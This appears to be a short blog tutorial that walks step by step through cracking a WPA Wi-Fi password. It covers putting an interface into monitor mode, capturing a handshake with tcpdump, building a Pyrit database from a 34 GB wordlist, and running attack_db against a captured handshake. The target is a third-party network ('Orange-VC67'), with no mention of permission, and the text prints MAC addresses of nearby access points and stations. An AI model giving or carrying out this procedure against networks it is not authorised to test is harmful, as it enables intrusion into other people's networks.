Pyrit   TCPDUMP & Pyrit   Pyrit


0. Check Access Points and Ad-Hoc cells  in  range

The command iwlist is used to display important information from wireless network interfaces.
We will use this command to obtain a list of Access Points and Ad-Hoc cells in range, and a whole bunch of information about them (ESSID, Quality, Frequency, Mode...).

iwlist wlan0 scan

From the output we can identify the type of encryption of each network, so this is definitely the first step of our way.


1.Prepare the wireless LAN interface to capture

Here are some instructions to capture wireless LAN packets using the basic commands of iwconfig and tcpdump.

First step: to put the interface into monitor mode, first right-click on the network icon in Gnome and de-select "Enable Networking" (i.e. so networking is disabled).

Once the Network Manager and other processes have been killed, we open a terminal and:

sudo ifdown wlan0
sudo iwconfig wlan0 mode monitor

Check the interface status:

sudo iwconfig wlan0

Turn the interface on again:

sudo ifconfig wlan0 up

Important: select the channel to monitor using the chan option:

sudo iwconfig wlan0 chan 11

We are ready now to start capturing packets in the channel we want.


2. Use TCPDUMP to capture packets like crazy!!!

Once we decided what we are interested in, it is time to record packets looking for a handshake (no changes in wlan0 configuration):

sudo tcpdump -i wlan0 -n -s 0 -w file.cap

Later on we will analyze other more active strategies.
We will analyze the file file.cap with Pyrit.


3. Pyrit

3.1 Installation

In Debian we install pyrit directly from synaptic.


3.1. Analyzing pcap files

We start the analysis looking for a handshake. We just open a terminal and type:

pyrit -r wifi.cap analyze

And if you are not so lucky, you get an output like this one:

#1: AccessPoint 88:25:2c:92:86:14 ('None')
  #0: Station 14:7d:c5:33:09:48
  #1: Station 4c:0b:3a:10:16:4f
#2: AccessPoint 1c:c6:3c:a9:b6:f7 ('Orange-VC67')
  #0: Station 01:00:5e:7f:ff:fa
  #1: Station d8:b3:77:33:c8:a3
#3: AccessPoint 00:01:38:f0:2a:f3 ('GRAN_BAR')
#4: AccessPoint 00:19:15:9e:f1:49 ('Tele5')
#5: AccessPoint 00:13:f7:e4:25:88 ('WLAN675326')
  #0: Station 01:00:5e:7f:ff:fa
  #1: Station 01:00:5e:00:00:fc
  #2: Station 00:1b:b1:4e:63:28
  #3: Station 01:00:5e:00:00:16
  #4: Station 01:00:5e:00:00:01
  #5: Station 4c:0b:3a:1e:60:22
  #6: Station 33:33:00:01:00:02
  #7: Station 33:33:00:01:00:03
#6: AccessPoint 00:24:6c:4a:15:81 ('urv-ambfils')
  #0: Station 70:d4:f2:c7:a5:d4
  #1: Station e4:b0:21:fa:70:74
#7: AccessPoint 62:1d:67:a1:24:d0 ('vodafone48D3')
  #0: Station 00:23:4d:cc:41:41

You obtain the BSSID and the ESSID,of each access point in range. And you get too the MAC addresses of the computers (stations) connected to the access points.
But no handshake yet. Be pacient. Sooner or later someone will use the access point.

If you are lucky you get something like:

#1: AccessPoint 38:72:c0:b1:2e:96 ('JAZZTEL_2E91')
#2: AccessPoint 38:72:c0:cd:ee:76 ('JAZZTEL_EE96')
#3: AccessPoint 1c:c6:3c:a9:b6:f7 ('Orange-VC67')
  #0: Station 84:74:2a:c0:f9:14, handshake found
  #1: Station d8:b3:77:33:c8:a3, handshake found
#4: AccessPoint 00:19:15:9e:f1:49 ('Tele5')
#5: AccessPoint 00:13:f7:e4:25:88 ('WLAN499521')
#6: AccessPoint 62:1d:67:a1:24:d0 ('vodafone29D1')


3.2 Stripping capture files

Captures files may be large files which contain only a few useful packets, so it is convenient to generate a new file which contains only useful information.
To do this we open a terminal and:

pyrit -r wifi.cap -o useful_wifi.cap strip

This way we generate a very small file easy to handle.


3.3 Populating and batch-processing the database

Get the word list from Mauris Tech Blog .
You will have to use the same password for each step: maurisdump.blogspot.com

Get the unpacked file (34Gb...) into pyrit:

pyrit -i 18_in_1.lst import_passwords

and wait forever... (a couple of days for an ordinary computer with a couple of CPUs).


Then get the name of your favorite SSID into Pyrit

pyrit -e Orange-VC67 create_essid

and then...

pyrit batch

and wait another forever... At the end you are ready to attack...


3.4 Obtaining the password

Finally cross your fingers and go for it!!!

pyrit -r useful_wifi.cap attack_db

and wait another forever.

If you are lucky, the password will come out...


3.5 Another way

We can look for the password and at the same time we populate the data base:

pyrit -e Orange-VC67 -r useful_wifi_cap attack_batch

and wait for a month or so...




Raconet Linux